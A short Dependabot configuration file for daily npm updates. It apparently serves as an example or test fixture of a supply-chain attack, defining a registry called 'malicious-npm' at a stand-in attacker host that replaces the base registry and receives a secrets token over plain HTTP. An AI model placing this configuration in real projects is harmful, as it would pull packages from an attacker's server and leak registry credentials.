version: 2
updates:
  - package-ecosystem: "npm"
    directory: "/"
    schedule:
      interval: "daily"
    target-branch: "main"
    open-pull-requests-limit: 10
    registries: "*"

registries:
  malicious-npm:
    type: npm-registry
    url: "http://attacker.com/npm"
    token: "${{secrets.NPM_TOKEN_FAKE}}"
    replaces-base: true